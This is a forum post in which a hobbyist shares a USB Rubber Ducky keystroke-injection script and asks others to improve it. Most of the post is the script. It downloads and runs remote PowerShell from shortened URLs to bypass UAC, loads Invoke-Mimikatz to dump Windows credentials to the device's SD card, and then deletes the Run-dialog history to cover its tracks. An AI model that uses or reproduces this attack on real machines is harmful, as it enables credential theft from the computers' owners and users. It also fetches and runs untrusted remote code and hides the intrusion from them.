Hi all,
I've been playing with the ducky for some time, figured it was time to give back to the community. I've incorporated the new UAC Bypass exploit with the Invoke-Mimikatz payload to dump to my SD card on my ducky, as I have the twin Ducky firmware, with the mimikatz output named after the computer.
The only issue I am having is that when it does the UAC Bypass it does not recognize the exit after, so there is still a small window present. I suspect it is because the exploit pops the new window up, and likely there is nothing I can do. Hopefully someone can figure it out.
Otherwise it works pretty nice. Feel free to clean it up and make it better.
REM open cmd and set drive letter
DELAY 2000
WINDOWS r
DELAY 200
STRING cmd.exe /T:01 /K mode CON: COLS=15 LINES=1
ENTER
DELAY 1000
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/fPl4tm'); Bypass-UAC -Method ucmDismMethod; exit;"
ENTER
DELAY 1000
REM Shrink windows
STRING mode CON: COLS=15 LINES=1
ENTER
REM get Ducky Drive letter
STRING $drive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'DUCKY'}
ENTER
DELAY 500
REM Run Mimikatz and dump to ducky in file named after computer
STRING IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/KBCGCr'); $Output = Invoke-Mimikatz -DumpCreds; $Output | Out-File ($drive.Name+$env:computername+".txt");
ENTER
DELAY 1000
STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue; exit
ENTER